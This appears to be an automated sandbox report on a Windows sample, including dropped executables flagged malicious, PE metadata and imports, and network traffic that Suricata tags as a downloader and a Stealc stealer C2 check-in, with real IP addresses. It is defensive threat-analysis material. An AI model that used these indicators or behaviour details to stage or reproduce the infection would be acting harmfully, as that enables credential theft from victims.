                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERE2A.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Oct 26 06:56:18 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):60932
                                                Entropy (8bit):1.9174833799659234
                                                Encrypted:false
                                                SSDEEP:192:VhrPwXhWXu9usXjiOEOJwcJySfRi/tI25Jn1WG5Mnie12Y+qIHH+E6yL0:VVU2u95EEJYSfRELOv1wqJEl0
                                                MD5:8E034F635C564267B2A1EA7A3680F067
                                                SHA1:7DD3FD8AA4EFE55757FA7FDFF1C8A8E157D77556
                                                SHA-256:7273AC67ADE669B0AAFDDA3FAD62503F1BF33878679997ECB84ED7E981FB83AC
                                                SHA-512:A3349491D61F05B36798A37A463796DBA2F4EB1CCA1583F1666EA2ACE62EAA4D5A7B9FCE74B6F9C59A92CAEA0AE2B959C4AB6CDFD4BCA49E9308881A848E73F2
                                                Malicious:false
                                                Reputation:low
                                                Preview:MDMP..a..... ..........g............4...............<............*..........T.......8...........T............3..<.......................................................................................................eJ......H.......GenuineIntel............T..............g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERF44.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8312
                                                Entropy (8bit):3.6973361989944395
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJUL686YYs+6FgmfFcspDH89bnrsfEVxNm:R6lXJo686YY96FgmfFc5nwfuS
                                                MD5:3C75E34541DFE5211119031813437FF3
                                                SHA1:DA454CEAFD16AE9C8499C6968829B388BF7E1464
                                                SHA-256:351F1C60287EAE0755C4CB8042D7F8E771CC8C5A3A382C6924F97DC064EB73D9
                                                SHA-512:BDC6B629203B8A15030D01AD87FE049B84BE8735BE49D18B25BE805FB45E2B97C104818E236DE8D46FE95E89A8BE2A532AE4DD5D73E61693508E91088C118B8B
                                                Malicious:false
                                                Reputation:low
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.7.6.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERF74.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4558
                                                Entropy (8bit):4.434280741444019
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsRrJg77aI9kvWpW8VYxYm8M4JhfFj4+q8ULSjQYpusd:uIjfRFI7K+7V1JQhSj3pusd
                                                MD5:6AD644A134F2C3C2AD14A0CDC77B7A4E
                                                SHA1:DAD565458CFB0FCD5F4CD1B847B942ADC7068459
                                                SHA-256:C43D9FC75893361E914C297C20E23AEC778E58C7AE56BB3BAC6F3A83C6A43321
                                                SHA-512:F2092267FF73BF75DE18F9AF19DE77218E2C3B510395B1473AC4D42D695B801A25F45221662ED91253416522B670A071ABE9B1FC5AAD4B2C2A606EFBF6919730
                                                Malicious:false
                                                Reputation:low
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="560039" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe

                                                Download File
                                                Process:C:\Users\user\Desktop\mCe4hBfqCT.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):352256
                                                Entropy (8bit):6.75440309490664
                                                Encrypted:false
                                                SSDEEP:6144:JTacvuKojyXqaDIBuWpui2LbDDGxeQnwV65U8Lz:JThuhjyqn7uLGxzG65Ue
                                                MD5:676EE4608A4ABD53EBDD6B380C2A3817
                                                SHA1:DA5F57893DE50E13A42AEAF0B905C53220458A13
                                                SHA-256:12997D7BDC9533FE81E634534A82CDD01D79A3F7106CF25ADA0C048B9ACC8D64
                                                SHA-512:1ECD00BFD305430344567C62AE86E2765427EF40BF0732A5D9AF1C5CBC7A22AB8FFCCF3EA62891BD44DE6A5018840B23D6ECC1661ABD0F4322A48A8DB93B6AF6
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 45%
                                                Reputation:low
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V..7..7..7...x?.7..e-.7..e<.7..e*..7......7..7...7..e#.7..e=.7..e8.7..Rich.7..................PE..L......e.................p...Dr...................@...........................u.....M...........................................<.... t.8{...........................................................................................................text...po.......p.................. ..`.rdata..P".......$...t..............@..@.data...|.p.........................@....nuhi....D....s..8..................@....rsrc...8{... t..|..................@..@........................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\64A.tmp.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\mCe4hBfqCT.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):352256
                                                Entropy (8bit):6.75440309490664
                                                Encrypted:false
                                                SSDEEP:6144:JTacvuKojyXqaDIBuWpui2LbDDGxeQnwV65U8Lz:JThuhjyqn7uLGxzG65Ue
                                                MD5:676EE4608A4ABD53EBDD6B380C2A3817
                                                SHA1:DA5F57893DE50E13A42AEAF0B905C53220458A13
                                                SHA-256:12997D7BDC9533FE81E634534A82CDD01D79A3F7106CF25ADA0C048B9ACC8D64
                                                SHA-512:1ECD00BFD305430344567C62AE86E2765427EF40BF0732A5D9AF1C5CBC7A22AB8FFCCF3EA62891BD44DE6A5018840B23D6ECC1661ABD0F4322A48A8DB93B6AF6
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 45%
                                                Reputation:low
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V..7..7..7...x?.7..e-.7..e<.7..e*..7......7..7...7..e#.7..e=.7..e8.7..Rich.7..................PE..L......e.................p...Dr...................@...........................u.....M...........................................<.... t.8{...........................................................................................................text...po.......p.................. ..`.rdata..P".......$...t..............@..@.data...|.p.........................@....nuhi....D....s..8..................@....rsrc...8{... t..|..................@..@........................................................................................................................................................................................................................................................................................................................

                                                C:\Windows\appcompat\Programs\Amcache.hve

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:MS Windows registry file, NT/2000 or above
                                                Category:dropped
                                                Size (bytes):1835008
                                                Entropy (8bit):4.4214488866772115
                                                Encrypted:false
                                                SSDEEP:6144:OSvfpi6ceLP/9skLmb0OThWSPHaJG8nAgeMZMMhA2fX4WABlEnNv0uhiTw:tvloThW+EZMM6DFyF03w
                                                MD5:8539CBB7A25CE4584D7D072730A7AD6F
                                                SHA1:7EFEF0AF514D393D5F955090B8E8C17DDE8E668C
                                                SHA-256:38080E03EC6FBF4E69592A2BB53720628FD6D6CF6EFE7A4BBC717F3A48BB468F
                                                SHA-512:DA4BEFAE714BCEB1B7C1B1A7E02ADCC1F97E37A8B85E39232BDB74A7A0B5B016F8E9733DDD22DC0ADB73BB09E289E1C3CF5AD53691A496F0476AEC14CA1CE0E8
                                                Malicious:false
                                                Reputation:low
                                                Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmj.;(t'...............................................................................................................................................................................................................................................................................................................................................F,.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.117334713665558
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:mCe4hBfqCT.exe
                                                File size:430'592 bytes
                                                MD5:5b01b239f2b48841380e3665d1c3f98a
                                                SHA1:ae35e49abca5950c5be20ef121ee8d74a903b877
                                                SHA256:8c32b0c595db81613c72044bb9d2d3d8170916760d30b7bf0c9710da462a2bb2
                                                SHA512:bd9f4fd807e3f9f85c6e4f14422b679434ac69e71a04fcb528a1a1a1f2277d16470d2a1460a6b0673400b2b055021ac2511c081cb74446acdf42cd1f2e7cd2dd
                                                SSDEEP:6144:frTpE9olFDU37c3s0IcJwjn5AK9fG65Z8xeFi0QoWOL5TeSAV65UCz:fi2lO37c3s2YAkfjM0QoJLkS265UC
                                                TLSH:A794CFE0A5F19527E3F39A781975A7B81E7FB8A7AD30934F2260124E3D713D28921713
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V...7...7...7...x?..7...e-..7...e<..7...e*..7.......7...7...7...e#..7...e=..7...e8..7..Rich.7..................PE..L.....Td...

                                                File Icon

                                                Icon Hash:46c7c30b0f4e0d59

                                                Static PE Info

                                                General

                                                Entrypoint:0x40171f
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                Time Stamp:0x645488AA [Fri May 5 04:40:10 2023 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:0
                                                File Version Major:5
                                                File Version Minor:0
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:0
                                                Import Hash:085d13fdef154decb8c8ad4679e90db7

                                                Entrypoint Preview

                                                Instruction
                                                call 00007F0D58E44AC6h
                                                jmp 00007F0D58E4145Dh
                                                mov edi, edi
                                                push ebp
                                                mov ebp, esp
                                                sub esp, 00000328h
                                                mov dword ptr [00450480h], eax
                                                mov dword ptr [0045047Ch], ecx
                                                mov dword ptr [00450478h], edx
                                                mov dword ptr [00450474h], ebx
                                                mov dword ptr [00450470h], esi
                                                mov dword ptr [0045046Ch], edi
                                                mov word ptr [00450498h], ss
                                                mov word ptr [0045048Ch], cs
                                                mov word ptr [00450468h], ds
                                                mov word ptr [00450464h], es
                                                mov word ptr [00450460h], fs
                                                mov word ptr [0045045Ch], gs
                                                pushfd
                                                pop dword ptr [00450490h]
                                                mov eax, dword ptr [ebp+00h]
                                                mov dword ptr [00450484h], eax
                                                mov eax, dword ptr [ebp+04h]
                                                mov dword ptr [00450488h], eax
                                                lea eax, dword ptr [ebp+08h]
                                                mov dword ptr [00450494h], eax
                                                mov eax, dword ptr [ebp-00000320h]
                                                mov dword ptr [004503D0h], 00010001h
                                                mov eax, dword ptr [00450488h]
                                                mov dword ptr [00450384h], eax
                                                mov dword ptr [00450378h], C0000409h
                                                mov dword ptr [0045037Ch], 00000001h
                                                mov eax, dword ptr [0044F004h]
                                                mov dword ptr [ebp-00000328h], eax
                                                mov eax, dword ptr [0044F008h]
                                                mov dword ptr [ebp-00000324h], eax
                                                call dword ptr [000000ECh]

                                                Rich Headers

                                                Programming Language:
                                                • [C++] VS2008 build 21022
                                                • [ASM] VS2008 build 21022
                                                • [ C ] VS2008 build 21022
                                                • [IMP] VS2005 build 50727
                                                • [RES] VS2008 build 21022
                                                • [LNK] VS2008 build 21022

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x4d8ac0x3c.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x27560000x17b38.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4d4680x40.rdata
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x4c0000x1a8.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x4a1900x4a20023b7deb78d2b7a1548ad8662b90bda3bFalse0.8787712110033726data7.6672496441732925IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x4c0000x22500x240071599186f795ee89d63c2cd43413650eFalse0.3565538194444444data5.433114795032559IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0x4f0000x270107c0x1400f9709805ace1b5d9cb1e2d277ecaa6e2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .meridu0x27510000x44000x3800b211778b80f6d441b6cf61ada776fc6dFalse0.0025809151785714285data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x27560000x17b380x17c00f1a8bd2362ed8f9d8a430e6a9761cf89False0.5783203125data5.801537597469369IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0x27568500xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5613006396588486
                                                RT_ICON0x27576f80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6371841155234657
                                                RT_ICON0x2757fa00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6779953917050692
                                                RT_ICON0x27586680x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7420520231213873
                                                RT_ICON0x2758bd00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5035269709543568
                                                RT_ICON0x275b1780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.5987335834896811
                                                RT_ICON0x275c2200x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.5967213114754099
                                                RT_ICON0x275cba80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7349290780141844
                                                RT_ICON0x275d0880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.392590618336887
                                                RT_ICON0x275df300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5451263537906137
                                                RT_ICON0x275e7d80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6111751152073732
                                                RT_ICON0x275eea00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6394508670520231
                                                RT_ICON0x275f4080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.41322701688555347
                                                RT_ICON0x27604b00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.40491803278688526
                                                RT_ICON0x2760e380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.44769503546099293
                                                RT_ICON0x27613080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.8121002132196162
                                                RT_ICON0x27621b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.8343862815884476
                                                RT_ICON0x2762a580x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.7782258064516129
                                                RT_ICON0x27631200x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7933526011560693
                                                RT_ICON0x27636880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.804253112033195
                                                RT_ICON0x2765c300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.8348968105065666
                                                RT_ICON0x2766cd80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.8430327868852459
                                                RT_ICON0x27676600x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.8634751773049646
                                                RT_STRING0x2767cf80x1a4data0.4880952380952381
                                                RT_STRING0x2767ea00x512data0.44298921417565484
                                                RT_STRING0x27683b80x4fedata0.4514866979655712
                                                RT_STRING0x27688b80x4d4data0.441747572815534
                                                RT_STRING0x2768d900x680data0.4308894230769231
                                                RT_STRING0x27694100x6d0data0.42660550458715596
                                                RT_STRING0x2769ae00x70adata0.42730299667036625
                                                RT_STRING0x276a1f00x7e4data0.4153465346534653
                                                RT_STRING0x276a9d80x7b2data0.41776649746192895
                                                RT_STRING0x276b1900x654data0.43703703703703706
                                                RT_STRING0x276b7e80x7dedata0.4200595829195631
                                                RT_STRING0x276bfc80x6bcdata0.43735498839907194
                                                RT_STRING0x276c6880x736data0.42524377031419286
                                                RT_STRING0x276cdc00x7cadata0.4202607823470411
                                                RT_STRING0x276d5900x5a2data0.43828016643550627
                                                RT_GROUP_ICON0x2767ac80x76dataTurkishTurkey0.6694915254237288
                                                RT_GROUP_ICON0x275d0100x76dataTurkishTurkey0.6610169491525424
                                                RT_GROUP_ICON0x27612a00x68dataTurkishTurkey0.7115384615384616
                                                RT_VERSION0x2767b400x1b4data0.5802752293577982

                                                Imports

                                                DLLImport
                                                KERNEL32.dllGetComputerNameA, GetNumaNodeProcessorMask, GetNumaProcessorNode, GetLocaleInfoA, CallNamedPipeA, InterlockedIncrement, MoveFileExW, SetDefaultCommConfigW, GetEnvironmentStringsW, GlobalLock, GetTimeFormatA, SetCommBreak, FreeEnvironmentStringsA, GetModuleHandleW, FormatMessageA, GetConsoleCP, FatalAppExitW, CopyFileW, GetSystemWow64DirectoryW, GetVersionExW, DeleteVolumeMountPointW, HeapCreate, GetNamedPipeInfo, GetConsoleAliasW, GetFileAttributesW, GetBinaryTypeA, GetModuleFileNameW, GetConsoleFontSize, GetStringTypeExA, LCMapStringA, GetStdHandle, SetLastError, GetProcAddress, GetLongPathNameA, MoveFileW, BuildCommDCBW, LoadLibraryA, UnhandledExceptionFilter, InterlockedExchangeAdd, OpenWaitableTimerW, LocalAlloc, SetCalendarInfoW, WritePrivateProfileStringA, SetCommMask, GetOEMCP, FindAtomW, ReadConsoleOutputCharacterW, OpenFileMappingA, LocalFree, LocalFileTimeToFileTime, CloseHandle, WriteConsoleW, MultiByteToWideChar, HeapAlloc, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedDecrement, GetACP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, GetLastError, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, HeapSize, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringW, GetStringTypeA, GetStringTypeW, InitializeCriticalSectionAndSpinCount, RtlUnwind, SetFilePointer, GetConsoleMode, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, CreateFileA
                                                WINHTTP.dllWinHttpOpenRequest

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                TurkishTurkey

                                                Network Behavior

                                                Suricata IDS Alerts

                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-10-26T08:56:07.383952+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704104.21.56.70443TCP
                                                2024-10-26T08:56:08.479342+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549705176.113.115.3780TCP
                                                2024-10-26T08:56:18.476436+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.54970662.204.41.17780TCP

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 26, 2024 08:56:05.432509899 CEST49704443192.168.2.5104.21.56.70
                                                Oct 26, 2024 08:56:05.432586908 CEST44349704104.21.56.70192.168.2.5
                                                Oct 26, 2024 08:56:05.432677031 CEST49704443192.168.2.5104.21.56.70
                                                Oct 26, 2024 08:56:05.447803020 CEST49704443192.168.2.5104.21.56.70
                                                Oct 26, 2024 08:56:05.447841883 CEST44349704104.21.56.70192.168.2.5
                                                Oct 26, 2024 08:56:06.079695940 CEST44349704104.21.56.70192.168.2.5
                                                Oct 26, 2024 08:56:06.079808950 CEST49704443192.168.2.5104.21.56.70
                                                Oct 26, 2024 08:56:06.977510929 CEST49704443192.168.2.5104.21.56.70
                                                Oct 26, 2024 08:56:06.977596998 CEST44349704104.21.56.70192.168.2.5
                                                Oct 26, 2024 08:56:06.978044033 CEST44349704104.21.56.70192.168.2.5
                                                Oct 26, 2024 08:56:06.978107929 CEST49704443192.168.2.5104.21.56.70
                                                Oct 26, 2024 08:56:06.980294943 CEST49704443192.168.2.5104.21.56.70
                                                Oct 26, 2024 08:56:07.023339033 CEST44349704104.21.56.70192.168.2.5
                                                Oct 26, 2024 08:56:07.383981943 CEST44349704104.21.56.70192.168.2.5
                                                Oct 26, 2024 08:56:07.384068966 CEST49704443192.168.2.5104.21.56.70
                                                Oct 26, 2024 08:56:07.384143114 CEST44349704104.21.56.70192.168.2.5
                                                Oct 26, 2024 08:56:07.384202957 CEST49704443192.168.2.5104.21.56.70
                                                Oct 26, 2024 08:56:07.384222984 CEST44349704104.21.56.70192.168.2.5
                                                Oct 26, 2024 08:56:07.384282112 CEST49704443192.168.2.5104.21.56.70
                                                Oct 26, 2024 08:56:07.384284973 CEST44349704104.21.56.70192.168.2.5
                                                Oct 26, 2024 08:56:07.384337902 CEST49704443192.168.2.5104.21.56.70
                                                Oct 26, 2024 08:56:07.409213066 CEST49704443192.168.2.5104.21.56.70
                                                Oct 26, 2024 08:56:07.409214020 CEST49704443192.168.2.5104.21.56.70
                                                Oct 26, 2024 08:56:07.409316063 CEST44349704104.21.56.70192.168.2.5
                                                Oct 26, 2024 08:56:07.409375906 CEST49704443192.168.2.5104.21.56.70
                                                Oct 26, 2024 08:56:07.601825953 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:07.607413054 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:07.607513905 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:07.607604027 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:07.613044024 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:08.479167938 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:08.479228020 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:08.479265928 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:08.479298115 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:08.479341984 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:08.479358912 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:08.479394913 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:08.479428053 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:08.479428053 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:08.479429960 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:08.479428053 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:08.479460955 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:08.479465008 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:08.479484081 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:08.479495049 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:08.479504108 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:08.479531050 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:08.479547977 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:08.479578972 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:08.485047102 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:08.485085011 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:08.485120058 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:08.485157013 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:08.485157967 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:08.485243082 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:08.617743015 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:08.617811918 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:08.617847919 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:08.617897987 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:08.617933989 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:08.617940903 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:08.617969036 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:08.617974997 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:08.618010998 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:08.618350029 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:08.618412018 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:08.618412971 CEST4970580192.168.2.5176.113.115.37
